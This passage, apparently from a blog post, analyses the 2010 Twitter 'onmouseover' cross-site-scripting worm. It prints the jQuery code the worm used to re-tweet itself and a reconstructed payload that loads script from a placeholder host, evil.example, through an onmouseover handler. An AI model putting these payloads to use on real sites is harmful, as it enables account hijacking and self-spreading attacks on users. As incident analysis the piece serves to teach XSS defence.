By using this function in combination with the onmouseover attribute, the attacker was able to load additional evil code from his own server. This code got immediately executed by the browser.

Step 3: Spreading the word

The key to success for any worm is spreading the word (a.k.a. sending itself to as many people as it can).

Since the attacker has control over a user’s twitter site anyway, he can make the user’s browser put the same maliciously crafted link that started the whole story into the controlled user’s status update box and push the “tweet” button. This is amazingly simple in javascript, using jQuery and knowing twitter’s HTML source:

$('#status').val('http://t.co/@"onmouseover="$.getScript(my_javascript_link)"/');
$('.status-update-form').submit();

That’s it.

Step 4: Do it with style

OK the basics are set up. Now let’s add some style. There are a couple of things the attacker can improve:

First of all, the user would still have to hover over the link for the hack to fire, since the attack relies on the execution of “onmouseover”. To maximize the chance that the user hovers over the actual link, let’s just print the link in a HUGE font size, filling up the whole browser window, so the attacker can be SURE the mouse will hover over it. Since we control the HTML displaying the link, we can just put the following in:

style="font-size:999999999999px;"

Done.
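Putting the pieces together, the crafted tweet would have looked something like the following string. This is a rough, illustrative reconstruction only; in particular, “http://evil.example/worm.js” is a made-up placeholder, not the address the attacker actually used.

```javascript
// Rough reconstruction of the crafted tweet text (illustrative only):
// - @" escapes the href attribute of the generated link,
// - style=... blows the link up to fill the page,
// - onmouseover=... pulls in the attacker's script via jQuery.
// "http://evil.example/worm.js" is a placeholder, not the real URL.
var payload = 'http://t.co/@"style="font-size:999999999999px;"' +
              'onmouseover="$.getScript(\'http://evil.example/worm.js\')"/';
console.log(payload);
console.log('tweet length: ' + payload.length); // comfortably under 140 chars
```

Thanks to the shortened script URL, the whole thing fits into a single tweet with room to spare.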

Next, the short URL. A tweet has 140 chars, so the attacker needed a URL shortening service to point to his malicious javascript file. In this concrete case, he used is.gd. Actually, is.gd is really gd, because they were reasonably fast at disabling the redirection, which helped stop the worm from spreading. The attacker would’ve been better off registering his own controlled, short domain… but who am I to give such tips 😛

Finally, some mockery. Instead of using any insignificant URL, the attacker used t.co, which is twitter’s own controversially discussed URL shortening service, introduced with the claim that it would enhance security for twitter users. Really stylish, isn’t it? 😀

Hope you’ve enjoyed reading how it’s done, and avoid Cross-Site-Scripting ppl! 🙂

[Update: Twitter put out an official statement about the issue which is, of course, a lot less technical than my analysis 😉 : http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html ]